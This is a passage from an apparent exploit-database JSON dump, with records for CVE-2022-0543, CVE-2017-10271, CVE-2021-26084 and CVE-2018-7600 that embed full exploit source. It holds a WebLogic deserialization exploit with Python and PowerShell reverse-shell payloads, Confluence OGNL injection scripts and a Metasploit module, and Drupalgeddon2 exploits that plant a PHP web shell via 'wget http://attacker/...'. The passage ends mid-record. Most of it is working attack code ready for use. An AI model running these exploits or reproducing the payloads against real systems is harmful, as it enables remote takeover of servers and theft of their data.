"2022-03-18T17:15:19", "type": "githubexploit", "title": "Exploit for Vulnerability in Redis", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0543"], "modified": "2022-03-23T17:17:27", "id": "9E6213F8-7CEE-5BBF-8343-AF41B8C920AA", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 
1}, {"lastseen": "2022-08-05T09:00:52", "description": "# CVE-2022-0543\nCVE-2022-0543_...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T06:41:50", "type": "githubexploit", "title": "Exploit for Vulnerability in Redis", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0543"], "modified": "2022-08-05T03:54:53", "id": "423F06A3-70C4-58A1-8A3E-74C89561449D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "zdt": [{"lastseen": "2018-04-14T17:44:57", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-01-08T00:00:00", "type": "zdt", "title": "Oracle WebLogic < 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-08T00:00:00", "id": "1337DAY-ID-29395", "href": "https://0day.today/exploit/description/29395", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\r\n# Date Authored: Jan 
3, 2018\r\n# Date Announced: 10/19/2017\r\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\r\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\r\n# Exploit is based off of POC by Luffin from Github\r\n# https://github.com/Luffin/CVE-2017-10271\r\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\r\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\r\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\r\n# CVE: CVE-2017-10271\r\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\r\n# (Python 3) Example check listener: python3 -m http.server 4444\r\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\r\n# (Netcat) Example exploit listener: nc -nlvp 4444\r\n \r\nfrom sys import exit\r\nfrom requests import post\r\nfrom argparse import ArgumentParser\r\nfrom random import choice\r\nfrom string import ascii_uppercase, ascii_lowercase, digits\r\nfrom xml.sax.saxutils import escape\r\n \r\nclass Exploit:\r\n \r\n def __init__(self, check, rhost, lhost, lport, windows):\r\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\r\n self.lhost = lhost\r\n self.lport = lport\r\n self.check = check\r\n if windows:\r\n self.target = 'win'\r\n else:\r\n self.target = 'unix'\r\n \r\n if self.target == 'unix':\r\n # Unix reverse shell\r\n # You should also be able to instead use something from MSFVenom. 
E.g.\r\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\r\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\r\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\n ).format(lhost=self.lhost, lport=self.lport)\r\n else:\r\n # Windows reverse shell\r\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\r\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\r\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\r\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\r\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\r\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\r\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\r\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\r\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\r\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\r\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\r\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\r\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\r\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\r\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\r\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\r\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\r\n )\r\n 
self.cmd_payload = escape(self.cmd_payload)\r\n \r\n def cmd_base(self):\r\n if self.target == 'win':\r\n return 'cmd'\r\n return '/bin/sh'\r\n \r\n def cmd_opt(self):\r\n if self.target == 'win':\r\n return '/c'\r\n return '-c'\r\n \r\n \r\n def get_generic_check_payload(self):\r\n random_uri = ''.join(\r\n choice(ascii_uppercase + ascii_lowercase + digits)\r\n for _ in range(16))\r\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <object id=\"url\" class=\"java.net.URL\">\r\n <string>http://{lhost}:{lport}/{random_uri}</string>\r\n </object>\r\n <object idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n \r\n return generic_check_payload.format(\r\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\r\n \r\n def get_process_builder_payload(self):\r\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <object class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>{cmd_payload}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\r\n cmd_payload=self.cmd_payload)\r\n \r\n def print_banner(self):\r\n print(\"=\" * 80)\r\n 
print(\"CVE-2017-10271 RCE Exploit\")\r\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\r\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\r\n print(\"Shell Listener: {lhost}:{lport}\".format(\r\n lhost=self.lhost, lport=self.lport))\r\n print(\"=\" * 80)\r\n \r\n def post_exploit(self, data):\r\n headers = {\r\n \"Content-Type\":\r\n \"text/xml;charset=UTF-8\",\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\r\n }\r\n payload = \"/wls-wsat/CoordinatorPortType\"\r\n \r\n vulnurl = self.url + payload\r\n try:\r\n req = post(\r\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\r\n if self.check:\r\n print(\"[*] Did you get an HTTP GET request back?\")\r\n else:\r\n print(\"[*] Did you get a shell back?\")\r\n except Exception as e:\r\n print('[!] Connection Error')\r\n print(e)\r\n \r\n def run(self):\r\n self.print_banner()\r\n if self.check:\r\n print('[+] Generating generic check payload')\r\n payload = self.get_generic_check_payload()\r\n else:\r\n print('[+] Generating execution payload')\r\n payload = self.get_process_builder_payload()\r\n print('[*] Generated:')\r\n print(payload)\r\n if self.check:\r\n print('[+] Running generic check payload')\r\n else:\r\n print('[+] Running {target} execute payload').format(target=self.target)\r\n \r\n self.post_exploit(data=payload)\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = ArgumentParser(\r\n description=\r\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\r\n )\r\n parser.add_argument(\r\n '-l',\r\n '--lhost',\r\n required=True,\r\n dest='lhost',\r\n nargs='?',\r\n help='The listening host that the remote server should connect back to')\r\n parser.add_argument(\r\n '-p',\r\n '--lport',\r\n required=True,\r\n dest='lport',\r\n nargs='?',\r\n help='The listening port that the remote server should connect back to')\r\n parser.add_argument(\r\n '-r',\r\n '--rhost',\r\n required=True,\r\n dest='rhost',\r\n nargs='?',\r\n help='The remote host base URL that we should send the exploit to')\r\n parser.add_argument(\r\n '-c',\r\n '--check',\r\n dest='check',\r\n action='store_true',\r\n help=\r\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\r\n )\r\n parser.add_argument(\r\n '-w',\r\n '--win',\r\n dest='windows',\r\n action='store_true',\r\n help=\r\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\r\n )\r\n \r\n args = parser.parse_args()\r\n \r\n exploit = Exploit(\r\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\r\n windows=args.windows)\r\n exploit.run()\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29395", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-21T00:16:24", "description": "The Oracle WebLogic WLS WSAT component is vulnerable to an XML deserialization remote code execution vulnerability. 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", "cvss3": {}, "published": "2018-01-29T00:00:00", "type": "zdt", "title": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-29T00:00:00", "id": "1337DAY-ID-29668", "href": "https://0day.today/exploit/description/29668", "sourceData": "", "sourceHref": "https://0day.today/exploit/29668", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2021-12-15T11:22:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "zdt", "title": "Atlassian Confluence WebWork OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-10T00:00:00", "id": "1337DAY-ID-36730", "href": "https://0day.today/exploit/description/36730", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence WebWork OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence's\n WebWork component to execute commands as the Tomcat user.\n },\n 'Author' => [\n 'Benny Jacob', # Discovery\n 'Jang', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],\n ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],\n ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],\n ['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],\n ['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']\n ],\n 'DisclosureDate' => '2021-08-25', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'], # TODO: Windows?\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false, # Tomcat user\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 
'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n # /var/atlassian/application-data/confluence/analytics-logs/*.atlassian-analytics.log\n # /var/atlassian/application-data/confluence/logs/atlassian-confluence.log\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n token1 = rand_text_alphanumeric(8..16)\n token2 = rand_text_alphanumeric(8..16)\n token3 = rand_text_alphanumeric(8..16)\n\n res = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\")\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\")\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n res = inject_ognl(ognl_payload(cmd))\n\n unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n end\n\n def inject_ognl(ognl)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),\n 'vars_post' => {\n # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html\n # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341\n 'queryString' => Rex::Text.to_hex(ognl, '\\\\u00')\n }\n )\n end\n\n def ognl_payload(cmd)\n # 
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution\n # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm\n # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html\n # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n '+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval('\n new java.lang.ProcessBuilder(\n \"/bin/bash\",\n \"-c\",\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n ).start()\n ')+'\n OGNL\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36730", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:51:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "zdt", "title": "Confluence Server 7.12.4 - (OGNL injection) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "1337DAY-ID-36694", "href": "https://0day.today/exploit/description/36694", "sourceData": "# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.12.x versions before 7.12.5\n# Tested on: Linux Distros \n# CVE : CVE-2021-26084\n\n#!/usr/bin/python3\n\n# References: \n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport optparse\n\nparser = optparse.OptionParser()\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\")\nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\")\n\noptions, args = parser.parse_args()\nsession = requests.Session()\n\nurl_vuln = options.url\nendpoint = options.path\n\nif not options.url or not options.path:\n\n print('[+] Specify an url target')\n print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')\n print('[+] Example help usage: exploit.py -h')\n exit()\n\n\ndef banner():\n\n print('---------------------------------------------------------------')\n print('[-] Confluence Server Webwork OGNL injection')\n print('[-] CVE-2021-26084')\n print('[-] https://github.com/h3v0x')\n print('--------------------------------------------------------------- \\n')\n\n\ndef cmdExec():\n\n while True:\n cmd = input('> ')\n xpl_url = url_vuln + endpoint\n xpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 
Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"}\n xpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"}\n rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)\n\n soup = BeautifulSoup(rawHTML.text, 'html.parser')\n queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']\n print(queryStringValue)\n\n\nbanner()\ncmdExec()\n", "sourceHref": "https://0day.today/exploit/36694", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-04-14T17:44:43", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-04-13T00:00:00", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "1337DAY-ID-30171", "href": "https://0day.today/exploit/description/30171", "sourceData": "require 'net/http' \r\n \r\n # 
Hans Topo ruby port from Drupalggedon2 exploit. \r\n # Based on Vitalii Rudnykh exploit \r\n \r\n target = ARGV[0] \r\n command = ARGV[1] \r\n \r\n url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n \r\n shell = \"<?php system($_GET['cmd']); ?>\" \r\n \r\n payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec' \r\n \r\n uri = URI(url) \r\n \r\n http = Net::HTTP.new(uri.host,uri.port) \r\n \r\n if uri.scheme == 'https' \r\n \thttp.use_ssl = true \r\n \thttp.verify_mode = OpenSSL::SSL::VERIFY_NONE \r\n end \r\n \r\n req = Net::HTTP::Post.new(uri.path) \r\n req.body = payload \r\n \r\n response = http.request(req) \r\n \r\n if response.code != \"200\" \r\n \tputs \"[*] Response: \" + response.code \r\n \tputs \"[*] Target seems not to be exploitable\" \r\n \texit \r\n end \r\n \r\n puts \"[*] Target seems to be exploitable.\" \r\n \r\n exploit_uri = URI(target+\"/sh.php?cmd=#{command}\") \r\n response = Net::HTTP.get_response(exploit_uri) \r\n puts response.body\r\n\r\n----------------------Exploit PoC 2---------------------------\r\n\r\n import sys \r\n import requests \r\n \r\n print ('################################################################') \r\n print ('# Proof-Of-Concept for CVE-2018-7600') \r\n print ('# by Vitalii Rudnykh') \r\n print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders') \r\n print ('# https://github.com/a2u/CVE-2018-7600') \r\n print ('################################################################') \r\n print ('Provided only for educational or information purposes\\n') \r\n \r\n target = raw_input('Enter target url (example: https://domain.ltd/): ') \r\n \r\n url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n payload = {'form_id': 'user_register_form', 
'_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'} \r\n \r\n r = requests.post(url, data=payload) \r\n if r.status_code != 200: \r\n sys.exit(\"Not exploitable\") \r\n print ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/30171", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-18T03:54:57", "description": "Exploit for php platform in category remote exploits", "cvss3": {}, "published": "2018-04-17T00:00:00", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "1337DAY-ID-30199", "href": "https://0day.today/exploit/description/30199", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon2',\r\n 'Description' => %q{\r\n CVE-2018-7600 / SA-CORE-2018-002\r\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\r\n allows remote attackers to execute arbitrary code because of an issue affecting\r\n multiple subsystems with default or common module configurations.\r\n \r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n \r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Vitalii Rudnykh', # initial PoC\r\n 'Hans Topo', # further research and ruby port\r\n 'Jos\u00e9 Ignacio Rojo' # further research and msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', 
'2018-002'],\r\n ['CVE', '2018-7600'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 15 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n \r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n \r\n def exploit_user_register\r\n data = Rex::MIME::Message.new\r\n data.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"')\r\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\r\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\r\n data.add_part('exec', nil, nil, 'form-data; 